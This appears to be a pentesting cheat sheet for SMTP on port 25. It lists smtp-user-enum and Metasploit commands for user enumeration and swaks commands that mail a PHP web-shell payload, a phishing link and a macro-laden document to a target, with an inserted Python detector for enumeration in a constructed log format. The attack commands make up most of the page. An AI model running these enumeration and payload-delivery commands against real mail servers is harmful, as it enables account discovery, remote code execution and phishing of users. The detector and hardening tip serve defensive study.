25 - Pentesting SMTP
SMTP stands for "Simple Mail Transfer Protocol". It is a protocol used for sending email messages between servers. Most email systems that send mail over the Internet use SMTP to send messages from one server to another, and to deliver messages to local mail clients like Microsoft Outlook or Apple Mail. SMTP servers listen for incoming mail, and then use other protocols to deliver the message to the recipient's mailbox.
nmap
telnet - (user enumeration)
netcat - (user enumeration)
smtp-user-enum - (user enumeration)
smtp-user-enum -M VRFY -U /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -t $IP
smtp-user-enum -M EXPN -U /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -t $IP
smtp-user-enum -M RCPT -U /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -t $IP
metasploit - (user enumeration)
use auxiliary/scanner/smtp/smtp_enum
msf auxiliary(smtp_enum) > set rhosts 10.10.200.211
msf auxiliary(smtp_enum) > set rport 25
msf auxiliary(smtp_enum) > set USER_FILE /tmp/users.txt
msf auxiliary(smtp_enum) > run
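Added example (not from the original page or from any tool listed above): the VRFY, EXPN and RCPT enumeration methods shown here leave a recognisable server-side pattern, and this detector flags any client that probes many distinct names. The log format, sample lines, threshold and function names are assumptions constructed for illustration, not the output of a real MTA.

```python
from collections import defaultdict

# Constructed sample lines in a hypothetical format (not a real MTA's log):
# <timestamp> <client IP> <SMTP verb> <argument> <reply code>
SAMPLE_LOG = """\
2024-05-01T10:00:01Z 203.0.113.7 VRFY root 252
2024-05-01T10:00:01Z 203.0.113.7 VRFY admin 550
2024-05-01T10:00:02Z 203.0.113.7 VRFY mark 252
2024-05-01T10:00:02Z 203.0.113.7 EXPN staff 550
2024-05-01T10:00:03Z 203.0.113.7 RCPT backup@localhost 550
2024-05-01T10:00:03Z 203.0.113.7 RCPT oracle@localhost 550
2024-05-01T10:05:10Z 198.51.100.20 RCPT mark@localhost 250
2024-05-01T10:05:40Z 198.51.100.20 RCPT marc@localhost 550
2024-05-01T10:06:00Z 198.51.100.20 garbage
"""

def parse(line):
    """Return (ip, verb, user, code), or None for a malformed line."""
    parts = line.split()
    if len(parts) != 5 or not parts[4].isdigit():
        return None
    _ts, ip, verb, arg, code = parts
    return ip, verb.upper(), arg.lower().split("@")[0], int(code)

def find_enumeration(log_text, min_targets=5):
    """Flag clients that probed at least min_targets distinct names."""
    probed = defaultdict(set)     # ip -> distinct names guessed
    confirmed = defaultdict(set)  # ip -> names the server acknowledged
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        ip, verb, user, code = rec
        if verb in ("VRFY", "EXPN"):
            probed[ip].add(user)          # every VRFY/EXPN is a probe
            if 200 <= code < 300:
                confirmed[ip].add(user)   # 2xx reply leaked a valid name
        elif verb == "RCPT":
            if code >= 500:
                probed[ip].add(user)      # rejected recipient = failed guess
            elif 200 <= code < 300:
                confirmed[ip].add(user)
    return {ip: {"probed": len(names), "confirmed": sorted(confirmed[ip])}
            for ip, names in probed.items() if len(names) >= min_targets}

if __name__ == "__main__":
    for ip, info in find_enumeration(SAMPLE_LOG).items():
        print(ip, info)
```

The `confirmed` list shows which account names the server disclosed to the flagged client. Disabling VRFY (on Postfix, `disable_vrfy_command = yes`) removes one of the three oracles.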
validate SMTP configuration
send email / executing command
send email
swaks --to mark@localhost --from admin@michalszalkowski.com --header "EmailHacked" --body 'BodyStart <?php system($_REQUEST["cmd"]); ?> BodyEnd' --server $IP
send email
swaks --to mark@localhost --from admin@michalszalkowski.com --header "EmailHacked" --body 'BodyStart <a href="http://192.168.45.206">click me</a> BodyEnd' --server $IP
send email
swaks --to mark@localhost --from admin@michalszalkowski.com --header "EmailHacked" --body 'BodyStart File for you BodyEnd' --attach mymacro.doc --server $IP
execute